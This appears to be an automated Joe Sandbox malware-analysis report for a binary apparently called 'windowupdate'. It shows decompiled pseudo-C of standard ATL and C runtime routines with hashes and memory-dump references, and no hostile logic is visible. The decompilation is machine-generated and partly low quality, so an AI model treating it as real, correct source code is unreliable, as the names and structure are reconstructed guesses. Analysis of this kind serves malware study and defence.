                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckSmanipStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$ERROR - Object deleted before window was destroyed
                      • API String ID: 1089072215-1108591109
                      • Opcode ID: 9e80d1c7105c529cdc29f0849d29aa972dcf320b19474dd9ba465abbb043dc31
                      • Instruction ID: 0cfa65556880359d7b33aa9e7601b664f843746ff59741205ce19698405c5b5c
                      • Opcode Fuzzy Hash: 9e80d1c7105c529cdc29f0849d29aa972dcf320b19474dd9ba465abbb043dc31
                      • Instruction Fuzzy Hash: FB11A071E44309AFDB14FB98DC03F7EB764EB01B40F04052AF605A76C2E6B5950486B5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3C110 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 55COMMON
                      Download Yara Rule
                      C-Code - Quality: 26%
                      			E00D3C110(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t15;
				void* _t20;
				void* _t30;
				void* _t31;

				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				if(_a4 != 0) {
					__eflags =  *_a4 - 0x2c;
					if(__eflags == 0) {
						 *((intOrPtr*)(_a4 + 0x1c)) = 0;
						_v8 = E00D32900(_a4 + 4, __esi, __eflags);
						__eflags = _v8;
						if(__eflags < 0) {
							_push("ERROR : Unable to initialize critical section in AtlWinModuleInit\n");
							_push(0);
							_push(E00D3F1E0(0xf23748));
							_push(E00D323B0( &_v16, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20d9));
							E00D323E0(__ebx, __edi, __esi, __eflags);
							_t31 = _t31 + 0x10;
							__eflags = 0;
							if(0 == 0) {
								_t20 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20da, 0, "%ls", 0xde40dc);
								_t31 = _t31 + 0x18;
								__eflags = _t20 - 1;
								if(__eflags == 0) {
									asm("int3");
								}
							}
						}
						_t15 = _v8;
					} else {
						_t15 = 0x80070057;
					}
				} else {
					_t15 = 0x80070057;
				}
				return E00DC1520(_t15, _t30 - _t31 + 0xc);
			}










                      0x00d3c116
                      0x00d3c11d
                      0x00d3c124
                      0x00d3c12f
                      0x00d3c13e
                      0x00d3c141
                      0x00d3c14d
                      0x00d3c15f
                      0x00d3c162
                      0x00d3c166
                      0x00d3c168
                      0x00d3c16d
                      0x00d3c179
                      0x00d3c18c
                      0x00d3c18d
                      0x00d3c192
                      0x00d3c195
                      0x00d3c197
                      0x00d3c1b1
                      0x00d3c1b6
                      0x00d3c1b9
                      0x00d3c1bc
                      0x00d3c1be
                      0x00d3c1be
                      0x00d3c1bc
                      0x00d3c197
                      0x00d3c1bf
                      0x00d3c143
                      0x00d3c143
                      0x00d3c143
                      0x00d3c131
                      0x00d3c131
                      0x00d3c131
                      0x00d3c1cf

                      Strings
                      • %ls, xrefs: 00D3C19E
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C1AA
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C17F
                      • ERROR : Unable to initialize critical section in AtlWinModuleInit, xrefs: 00D3C168
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to initialize critical section in AtlWinModuleInit
                      • API String ID: 0-4079014719
                      • Opcode ID: 64716041adb229e4b755f872435f3e6f80564c9f46ddcb01c0e548a6d8ea0af7
                      • Instruction ID: 2ff85ce95b8c3878da919932c0d4f97fef7ace0fe584ff045e6977bf2f6a1d9d
                      • Opcode Fuzzy Hash: 64716041adb229e4b755f872435f3e6f80564c9f46ddcb01c0e548a6d8ea0af7
                      • Instruction Fuzzy Hash: FD11CE74E40308EFDB10FB99DC07B6D7720DB10704F248469F9052B283D7B59A549BB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4DBA2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00D4DBA2(void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _t31;
				void* _t48;

				 *((intOrPtr*)( *((intOrPtr*)(_t48 + 0xc)) + 0xfffffffffffffffc)) =  *((intOrPtr*)(_t48 - 0x34));
				E00D49A50(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi,  *((intOrPtr*)(_t48 - 0x38)));
				 *((intOrPtr*)(E00D4C670(__ebx,  *((intOrPtr*)(_t48 - 0x34)), __edi, __esi) + 0x10)) =  *((intOrPtr*)(_t48 - 0x3c));
				 *((intOrPtr*)(E00D4C670(__ebx,  *((intOrPtr*)(_t48 - 0x3c)), __edi, __esi) + 0x14)) =  *((intOrPtr*)(_t48 - 0x40));
				_t31 =  *((intOrPtr*)(_t48 + 8));
				if( *_t31 == 0xe06d7363) {
					_t38 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x10)) == 3) {
						if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930520) {
							L5:
							if( *((intOrPtr*)(_t48 - 0x44)) == 0 &&  *((intOrPtr*)(_t48 - 0x28)) != 0) {
								_t31 = E00D4B2C0(_t38,  *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x18)));
								if(_t31 != 0) {
									if( *((intOrPtr*)(_t48 - 0x48)) == 0) {
										 *(_t48 - 0x19) = 0;
									} else {
										 *(_t48 - 0x19) = 1;
									}
									_push( *(_t48 - 0x19) & 0x000000ff);
									return E00D4B0E0( *((intOrPtr*)(_t48 + 8)));
								}
							}
						} else {
							_t31 =  *((intOrPtr*)(_t48 + 8));
							if( *((intOrPtr*)(_t31 + 0x14)) == 0x19930521) {
								goto L5;
							} else {
								_t38 =  *((intOrPtr*)(_t48 + 8));
								if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 8)) + 0x14)) == 0x19930522) {
									goto L5;
								}
							}
						}
					}
				}
				return _t31;
			}





                      0x00d4dbb0
                      0x00d4dbb7
                      0x00d4dbc7
                      0x00d4dbd2
                      0x00d4dbd5
                      0x00d4dbde
                      0x00d4dbe0
                      0x00d4dbe7
                      0x00d4dbf3
                      0x00d4dc0d
                      0x00d4dc11
                      0x00d4dc20
                      0x00d4dc2a
                      0x00d4dc30
                      0x00d4dc38
                      0x00d4dc32
                      0x00d4dc32
                      0x00d4dc32
                      0x00d4dc40
                      0x00000000
                      0x00d4dc4a
                      0x00d4dc2a
                      0x00d4dbf5
                      0x00d4dbf5
                      0x00d4dbff
                      0x00000000
                      0x00d4dc01
                      0x00d4dc01
                      0x00d4dc0b
                      0x00000000
                      0x00000000
                      0x00d4dc0b
                      0x00d4dbff
                      0x00d4dbf3
                      0x00d4dbe7
                      0x00d4dc4d

                      APIs
                        • Part of subcall function 00D49A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00D49A56
                        • Part of subcall function 00D49A50: ___vcrt_getptd.LIBVCRUNTIMED ref: 00D49A6C
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4DBBF
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4DBCA
                      • __IsExceptionObjectToBeDestroyed.LIBVCRUNTIMED ref: 00D4DC20
                      • ___DestructExceptionObject.LIBCMTD ref: 00D4DC45
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd$ExceptionObject$DestroyedDestruct
                      • String ID: csm
                      • API String ID: 485384042-1018135373
                      • Opcode ID: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction ID: 003231f61018b9cfcbf2890769c4b366d55d41109494edc2d61713039d47d367
                      • Opcode Fuzzy Hash: 43f3dd555d828a9f6842bfda216e3fcc1360bef38e7dd899cbb3451b7ead1d39
                      • Instruction Fuzzy Hash: D4212974A01208EFCF18DFA4D084AAE7B73AFA9345F588058E8051B652C7B4DE81CBB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D98780 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E00D98780(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed char _t13;
				void* _t18;
				void* _t24;

				E00D66E20( &_v16, _a4);
				_t13 = E00D7EE40( &_v16);
				_t21 = _t13 & 0x000000ff;
				if((_t13 & 0x000000ff) == 0) {
					_v8 = 0;
				} else {
					_v8 = 1;
				}
				_v12 = _v8;
				_t27 = _v12;
				if(_v12 == 0) {
					_t18 = L00D84930(_t27, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0, L"%ls", L"stream.valid()");
					_t24 = _t24 + 0x18;
					if(_t18 == 1) {
						asm("int3");
					}
				}
				if(_v12 != 0) {
					return E00D98760( &_v16);
				} else {
					 *((intOrPtr*)(L00D82F70(_t21))) = 0x16;
					return E00D82900(L"stream.valid()", L"_fileno", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fileno.cpp", 0x11, 0) | 0xffffffff;
				}
			}









                      0x00d9878f
                      0x00d98797
                      0x00d9879c
                      0x00d987a1
                      0x00d987ac
                      0x00d987a3
                      0x00d987a3
                      0x00d987a3
                      0x00d987b6
                      0x00d987b9
                      0x00d987bd
                      0x00d987d4
                      0x00d987d9
                      0x00d987df
                      0x00d987e1
                      0x00d987e1
                      0x00d987df
                      0x00d987e6
                      0x00000000
                      0x00d987e8
                      0x00d987ed
                      0x00000000
                      0x00d9880e

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D9878F
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$_fileno$minkernel\crts\ucrt\src\appcrt\stdio\fileno.cpp$stream.valid()
                      • API String ID: 4219598475-3741990651
                      • Opcode ID: 884f7993c337cf95de10880664bc239cdda942a58b11e57d66251872b7f4e4e0
                      • Instruction ID: 58f177cc38eaef92e2c65fa59c14392f8af953db789d7a9bb040312ec2060314
                      • Opcode Fuzzy Hash: 884f7993c337cf95de10880664bc239cdda942a58b11e57d66251872b7f4e4e0
                      • Instruction Fuzzy Hash: 4B01B574D50308BEDF14EA94DD52BADB7B4DF41B04F344199F105262C2DEB15A48E6B1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D446E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                      Download Yara Rule
                      C-Code - Quality: 79%
                      			E00D446E0(struct HWND__** __ecx, void* __esi, intOrPtr _a4, int _a8) {
				struct HWND__** _v8;
				void* _t10;
				void* _t17;
				void* _t27;
				void* _t28;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t10 = E00DC1520(IsWindow( *_v8), _t28 - _t28);
				_t31 = _t10;
				if(_t10 == 0) {
					_t17 = L00D84930(_t31, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x6d4, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t28 = _t28 + 0x18;
					if(_t17 == 1) {
						asm("int3");
					}
				}
				E00D44630(_a4, E00DC1520(GetDlgItem( *_v8, _a8), _t28 - _t28));
				return E00DC1520(_a4, _t27 - _t28 + 4);
			}








                      0x00d446e3
                      0x00d446e5
                      0x00d446ec
                      0x00d446ff
                      0x00d44704
                      0x00d44706
                      0x00d44720
                      0x00d44725
                      0x00d4472b
                      0x00d4472d
                      0x00d4472d
                      0x00d4472b
                      0x00d4474b
                      0x00d44761

                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D44719
                      • %ls, xrefs: 00D4470D
                      • ::IsWindow(m_hWnd), xrefs: 00D44708
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ItemWindow
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 1669990519-3692021841
                      • Opcode ID: d465640cbd8ae15be408b8ffd003ad69e058491529fe9b2235eacae4db7e64b3
                      • Instruction ID: df16c29ca0f5844e762cb1c38e255d73e32c0bc8cca9f6afbed207f8925ac2eb
                      • Opcode Fuzzy Hash: d465640cbd8ae15be408b8ffd003ad69e058491529fe9b2235eacae4db7e64b3
                      • Instruction Fuzzy Hash: AC01A275E50215AFC610FB58DC43F9EB378EB49750F504159F809A7241E671EE4087F5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4B360 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                      Download Yara Rule
                      C-Code - Quality: 100%
                      			E00D4B360(intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				void* _t29;
				void* _t32;
				void* _t39;
				void* _t40;

				_t33 =  *_a4;
				_v12 =  *_a4;
				_v8 =  *_v12;
				if(_v8 == 0xe0434352 || _v8 == 0xe0434f4d) {
					L5:
					if( *((intOrPtr*)(E00D4C670(_t32, _t33, _t39, _t40) + 0x18)) > 0) {
						_v16 = E00D4C670(_t32, _t33, _t39, _t40) + 0x18;
						 *_v16 =  *_v16 - 1;
					}
					return 0;
				} else {
					if(_v8 == 0xe06d7363) {
						 *((intOrPtr*)(E00D4C670(_t32, _t33, _t39, _t40) + 0x10)) = _v12;
						_v20 =  *((intOrPtr*)(_a4 + 4));
						_t29 = E00D4C670(_t32, _v12, _t39, _t40);
						_t33 = _v20;
						 *((intOrPtr*)(_t29 + 0x14)) = _v20;
						E00D89BF0(_v20);
						goto L5;
					}
					return 0;
				}
			}











                      0x00d4b369
                      0x00d4b36b
                      0x00d4b373
                      0x00d4b37d
                      0x00d4b3b7
                      0x00d4b3c0
                      0x00d4b3ca
                      0x00d4b3d8
                      0x00d4b3d8
                      0x00000000
                      0x00d4b388
                      0x00d4b38f
                      0x00d4b39b
                      0x00d4b3a4
                      0x00d4b3a7
                      0x00d4b3ac
                      0x00d4b3af
                      0x00d4b3b2
                      0x00000000
                      0x00d4b3b2
                      0x00000000
                      0x00d4b3de

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B393
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B3A7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B3B7
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 00D4B3C2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: csm
                      • API String ID: 984050374-1018135373
                      • Opcode ID: 3ee4a7db9345cb27c31518267df98c4758993a37573f358793b65d36afabddf4
                      • Instruction ID: aec0cec293db62652a4aaea1f4f385d57b7f5a4d83ba937c3306824e1924066e
                      • Opcode Fuzzy Hash: 3ee4a7db9345cb27c31518267df98c4758993a37573f358793b65d36afabddf4
                      • Instruction Fuzzy Hash: 29111B78A01208DFCB14EFA8C1855ADBBB0FF59310F1595AAD84597321D774EA40DFB2
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3C410 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 42COMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E00D3C410(struct HWND__** __ecx, void* __esi, int _a4) {
				struct HWND__** _v8;
				void* _t8;
				void* _t13;
				void* _t22;
				void* _t23;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t8 = E00DC1520(IsWindow( *_v8), _t23 - _t23);
				_t26 = _t8;
				if(_t8 == 0) {
					_t13 = L00D84930(_t26, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x508, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t23 = _t23 + 0x18;
					if(_t13 == 1) {
						asm("int3");
					}
				}
				return E00DC1520(E00DC1520(ShowWindow( *_v8, _a4), _t23 - _t23), _t22 - _t23 + 4);
			}








                      0x00d3c413
                      0x00d3c415
                      0x00d3c41c
                      0x00d3c42f
                      0x00d3c434
                      0x00d3c436
                      0x00d3c450
                      0x00d3c455
                      0x00d3c45b
                      0x00d3c45d
                      0x00d3c45d
                      0x00d3c45b
                      0x00d3c485

                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D3C449
                      • %ls, xrefs: 00D3C43D
                      • ::IsWindow(m_hWnd), xrefs: 00D3C438
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Show
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 990937876-3692021841
                      • Opcode ID: 2109fa095f4085f2395e0ef7d9f8fb778a06d1154ad1bb2663da8536fef3e918
                      • Instruction ID: 39f1a459029fe23c80670e96b85c2d8df7042f93867ce90a1be794306c70d84e
                      • Opcode Fuzzy Hash: 2109fa095f4085f2395e0ef7d9f8fb778a06d1154ad1bb2663da8536fef3e918
                      • Instruction Fuzzy Hash: E0F0AF76E50316ABC620FB58AC43FAEB778DB45750F504168F909A7242E572EE0046F6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D44DE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E00D44DE0(struct HWND__** __ecx, void* __esi) {
				struct HWND__** _v8;
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t7 = E00DC1520(IsWindow( *_v8), _t21 - _t21);
				_t24 = _t7;
				if(_t7 == 0) {
					_t12 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x35f, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t21 = _t21 + 0x18;
					if(_t12 == 1) {
						asm("int3");
					}
				}
				return E00DC1520(E00DC1520(GetWindowLongA( *_v8, 0xfffffff0), _t21 - _t21), _t20 - _t21 + 4);
			}








                      0x00d44de3
                      0x00d44de5
                      0x00d44dec
                      0x00d44dff
                      0x00d44e04
                      0x00d44e06
                      0x00d44e20
                      0x00d44e25
                      0x00d44e2b
                      0x00d44e2d
                      0x00d44e2d
                      0x00d44e2b
                      0x00d44e53

                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D44E19
                      • %ls, xrefs: 00D44E0D
                      • ::IsWindow(m_hWnd), xrefs: 00D44E08
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID: %ls$::IsWindow(m_hWnd)$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h
                      • API String ID: 847901565-3692021841
                      • Opcode ID: 305c3c5dfe700bf9ea596a61af3f1d65545bfbf49da0b26a00ce7a230f5eb454
                      • Instruction ID: ba3c3b78196b6caeab1f54b8ee2ccb34556c35d830334e72b80b6728eb149726
                      • Opcode Fuzzy Hash: 305c3c5dfe700bf9ea596a61af3f1d65545bfbf49da0b26a00ce7a230f5eb454
                      • Instruction Fuzzy Hash: B5F0F636E503266FC620BB5DAC43F5EB368EB45760F5002A8F809A7392E561DE0046F6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D44660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 40windowCOMMON
                      Download Yara Rule
                      C-Code - Quality: 77%
                      			E00D44660(struct HWND__** __ecx, void* __esi) {
				struct HWND__** _v8;
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;

				_push(__ecx);
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				_t7 = E00DC1520(IsWindow( *_v8), _t21 - _t21);
				_t24 = _t7;
				if(_t7 == 0) {
					_t12 = L00D84930(_t24, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0x50e, 0, "%ls", L"::IsWindow(m_hWnd)");
					_t21 = _t21 + 0x18;
					if(_t12 == 1) {
						asm("int3");
					}
				}
				return E00DC1520(E00DC1520(IsWindowVisible( *_v8), _t21 - _t21), _t20 - _t21 + 4);
			}








                      0x00d44663
                      0x00d44665
                      0x00d4466c
                      0x00d4467f
                      0x00d44684
                      0x00d44686
                      0x00d446a0
                      0x00d446a5
                      0x00d446ab
                      0x00d446ad
                      0x00d446ad
                      0x00d446ab
                      0x00d446d1

                      APIs
                      Strings
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h, xrefs: 00D44699
                      • %ls, xrefs: 00D4468D
                      • ::IsWindow(m_hWnd), xrefs: 00D44688
